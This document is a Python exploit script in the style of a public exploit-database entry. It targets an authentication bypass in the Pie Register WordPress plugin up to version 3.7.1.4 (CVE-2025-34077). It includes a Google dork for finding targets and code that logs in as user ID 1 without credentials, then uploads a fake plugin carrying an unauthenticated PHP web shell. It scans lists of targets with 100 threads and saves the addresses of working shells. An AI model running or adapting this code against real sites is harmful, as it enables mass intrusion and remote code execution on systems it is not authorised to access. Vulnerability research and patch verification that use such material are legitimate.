
# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE
# Google Dork: inurl:/wp-content/plugins/pie-register/
# Date: 2025-07-09
# Exploit Author: Md Amanat Ullah (xSwads)
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
# Version: <= 3.7.1.4
# Tested on: Ubuntu 22.04
# CVE: CVE-2025-34077
#
# How it works (see exploit() below): a POST to ?pr_social_login=1 carrying
# social_site=true&user_id_social_site=1 is expected to hand back session
# cookies for that user ID although no credentials are sent; the same session
# then uploads a plugin ZIP through wp-admin/plugin-install.php?upload, which
# only succeeds if the bypassed user may install plugins.
# Warning: a successful run leaves an unauthenticated web shell at
# wp-content/plugins/evilplugin/shell.php that executes any ?cmd= parameter.
# Use only against systems you are authorised to test and delete the plugin
# folder afterwards.
#!/usr/bin/env python3
import requests
import zipfile
import io
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed
from colorama import Fore, Style, init
from threading import Lock
init(autoreset=True)  # colorama: reset the colour after every print()

# Payload dropped inside the fake plugin: an unauthenticated web shell that
# runs whatever arrives in ?cmd= through shell_exec(). Anyone who discovers
# the URL can use it, so clean it up after an authorised test.
SHELL_PHP = "<?php if(isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>"
SHELL_FILE = "shell.php"

# Folder name inside the archive (and therefore the plugin slug) and the
# file name presented to WordPress on upload.
PLUGIN_DIR = "evilplugin"
ZIP_NAME = "evilplugin.zip"

# HTTP settings shared by both requests in the chain; a plain browser-like
# User-Agent and a 10 s per-request timeout.
HEADERS = {'User-Agent': 'Mozilla/5.0'}
TIMEOUT = 10

# Successful shell URLs are appended here. Several worker threads may write
# at the same time, so writes are serialised with `lock`.
OUTPUT_FILE = "Shells.txt"
lock = Lock()
def FilterURLS(site):
    """Normalise a raw target string into a base URL that ends in '/'.

    Surrounding whitespace is dropped, a missing scheme defaults to plain
    ``http://`` (not HTTPS, so the bypass request may travel in clear text
    unless the target redirects), and a trailing slash is appended so the
    callers can concatenate paths directly.

    Args:
        site: Host name or URL, possibly with whitespace around it.

    Returns:
        The normalised URL string.
    """
    url = site.strip()
    has_scheme = url.startswith(('http://', 'https://'))
    if not has_scheme:
        url = f'http://{url}'
    return url if url.endswith('/') else f'{url}/'
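def make_shell_zip(plugin_dir=None, shell_file=None, shell_php=None):
    """Build an in-memory WordPress plugin ZIP that carries the PHP web shell.

    The archive holds two entries under one top-level folder: a stub
    ``<plugin_dir>/<plugin_dir>.php`` so WordPress treats the folder as a
    plugin, and ``<plugin_dir>/<shell_file>`` containing the shell source.

    Args:
        plugin_dir: Top-level folder / plugin slug; defaults to PLUGIN_DIR.
        shell_file: File name of the shell entry; defaults to SHELL_FILE.
        shell_php: Shell source written into that entry; defaults to SHELL_PHP.

    Returns:
        An io.BytesIO rewound to offset 0, ready to be passed to requests as
        a file body.
    """
    # Defaults are resolved at call time so the module constants remain the
    # single source of truth while callers can still override them.
    if plugin_dir is None:
        plugin_dir = PLUGIN_DIR
    if shell_file is None:
        shell_file = SHELL_FILE
    if shell_php is None:
        shell_php = SHELL_PHP

    buf = io.BytesIO()
    # Entries are stored uncompressed (zipfile's default); leaving the
    # context closes the archive and writes the central directory.
    with zipfile.ZipFile(buf, 'w') as archive:
        archive.writestr(f"{plugin_dir}/{plugin_dir}.php", "<?php /* Plugin */ ?>")
        archive.writestr(f"{plugin_dir}/{shell_file}", shell_php)
    buf.seek(0)
    return buf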
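def exploit(target):
    """Run the two-stage chain against one site and record the shell URL.

    Stage 1 (auth bypass): POST ``social_site=true`` and
    ``user_id_social_site=1`` to ``<target>?pr_social_login=1`` with no
    credentials. Success is inferred only from the session having received
    any cookie; neither the HTTP status nor the cookie name is checked, so a
    site that sets an unrelated cookie (a WAF, for example) could pass this
    check and then fail at the upload.

    Stage 2 (RCE): upload the in-memory plugin ZIP through
    ``wp-admin/plugin-install.php?upload`` with that session and look for
    "Plugin installed successfully" in the response body.

    Side effects: prints one status line per target and, on success, appends
    the shell URL to OUTPUT_FILE under ``lock``. The dropped shell executes
    any ``?cmd=`` parameter without authentication - remove it after an
    authorised test.

    Args:
        target: Host or URL; normalised by FilterURLS().
    """
    target = FilterURLS(target)
    session = requests.Session()
    bypass_data = {"social_site": "true", "user_id_social_site": "1"}

    # Only transport-level failures are expected here; a bare ``except``
    # would also hide SystemExit and genuine bugs inside the worker thread.
    try:
        session.post(f"{target}?pr_social_login=1", data=bypass_data,
                     headers=HEADERS, timeout=TIMEOUT)
    except requests.RequestException:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    if not session.cookies:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    files = {"pluginzip": (ZIP_NAME, make_shell_zip(), "application/zip")}
    try:
        upload = session.post(f"{target}wp-admin/plugin-install.php?upload",
                              files=files, headers=HEADERS, timeout=TIMEOUT)
    except requests.RequestException:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    if "Plugin installed successfully" not in upload.text:
        print(f"{Fore.RED}[Failed] - {target}")
        return

    shell_url = f"{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}"
    print(f"{Fore.GREEN}[Exploited] - {shell_url}")
    # Several worker threads append to the same file; serialise the write.
    with lock, open(OUTPUT_FILE, "a") as f:
        f.write(shell_url + "\n")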
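def main(targets_file):
    """Read one target per line from ``targets_file`` and run exploit() on each.

    Blank lines are skipped; every other line is handed to exploit() from a
    pool of up to 100 threads. 100 concurrent connections is aggressive for
    an authorised engagement - lower it if the scope demands. exploit()
    handles its own network errors, but any other exception escaping a worker
    (for example a failure writing OUTPUT_FILE) is reported here rather than
    silently discarded.

    Args:
        targets_file: Path to the list of hosts/URLs.
    """
    with open(targets_file, "r") as f:
        targets = [line.strip() for line in f if line.strip()]

    with ThreadPoolExecutor(max_workers=100) as executor:
        # Keep the target next to its future so a failure can be attributed.
        futures = {executor.submit(exploit, target): target for target in targets}
        for future in as_completed(futures):
            exc = future.exception()
            if exc is not None:
                print(f"{Fore.RED}[Error] - {futures[future]}: {exc}")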
if __name__ == "__main__":
    # Exactly one argument is accepted: the path to the target list file.
    argv = sys.argv[1:]
    if len(argv) != 1:
        print(f"Usage: {sys.argv[0]} list.txt")
        sys.exit(1)
    main(argv[0])